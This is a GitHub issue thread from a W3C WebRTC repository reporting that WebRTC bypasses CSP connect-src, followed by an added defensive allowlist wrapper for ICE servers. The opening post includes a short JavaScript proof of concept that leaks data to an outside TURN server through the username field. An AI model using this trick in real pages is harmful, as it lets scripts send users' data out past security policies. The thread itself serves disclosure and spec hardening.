w3c/webrtc-nv-use-cases

WebRTC bypass CSP connect-src policies

murillo128 opened this issue · 4 comments

As explained here: w3c/webappsec-csp#92, WebRTC bypasses the CSP security policies for connect-src, and a malicious script could use WebRTC to leak data to a rogue server.

Note that it is not even necessary to use datachannels at all, as you could leak data (at a low rate) to a specially crafted TURN server in the username:

var pc = new RTCPeerConnection({"iceServers":[{"urls":["turn:74.125.140.127:19305?transport=udp"],"username":"_all_your_data_belongs_to_us","credential":"."}]});
pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp));

IMHO this should be covered in the CSP spec, but we should add a warning in the security and privacy section of the WebRTC spec until this is solved.

Pull request on CSP spec: w3c/webappsec-csp#287

What's the status here?

Since this is a new feature, and we've stopped adding new features, I'm moving this to the NV repo.

aboba commented

With merger of PR 38, closing this issue.
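
For the gap described in the opening post, a page-level check that validates the `iceServers` of every `RTCPeerConnection` against an allowlist before any ICE traffic is sent. This is an added example, not code from the issue, the CSP pull request or the WebRTC spec; the host names in `ALLOWED_ICE_HOSTS` and all function names are assumptions for illustration.

```javascript
// Added example: allowlist check for RTCPeerConnection ICE servers.
// ALLOWED_ICE_HOSTS and the function names are hypothetical, not from the issue.
const ALLOWED_ICE_HOSTS = new Set(["turn.example.com", "stun.example.com"]); // constructed

// Extract the host from a stun:/stuns:/turn:/turns: URI; null if it is not one.
function iceUrlHost(url) {
  const m = /^(stuns?|turns?):([^?]+)(\?.*)?$/i.exec(String(url).trim());
  if (!m) return null;
  const hostPort = m[2];
  if (hostPort.startsWith("[")) {              // bracketed IPv6 literal
    const end = hostPort.indexOf("]");
    return end > 0 ? hostPort.slice(1, end).toLowerCase() : null;
  }
  return hostPort.split(":")[0].toLowerCase() || null;
}

// Return every ICE server URL in the configuration whose host is not allowlisted.
function disallowedIceUrls(config, allowed = ALLOWED_ICE_HOSTS) {
  const bad = [];
  for (const server of (config && config.iceServers) || []) {
    const urls = [].concat(server.urls || server.url || []); // string or array
    for (const u of urls) {
      const host = iceUrlHost(u);
      if (host === null || !allowed.has(host)) bad.push(String(u));
    }
  }
  return bad;
}

// Wrap the constructor so a non-allowlisted server throws before ICE starts.
function installIceGuard(scope = globalThis, allowed = ALLOWED_ICE_HOSTS) {
  const Native = scope.RTCPeerConnection;
  if (typeof Native !== "function") return false; // e.g. Node.js: nothing to wrap
  scope.RTCPeerConnection = new Proxy(Native, {
    construct(target, args, newTarget) {
      const bad = disallowedIceUrls(args[0], allowed);
      if (bad.length) throw new Error("ICE server not allowlisted: " + bad.join(", "));
      return Reflect.construct(target, args, newTarget);
    },
  });
  return true;
}
```

The guard covers only the constructor in the scope where it is installed; `setConfiguration` would need the same check, and an in-page wrapper is not an equivalent of user-agent enforcement through CSP.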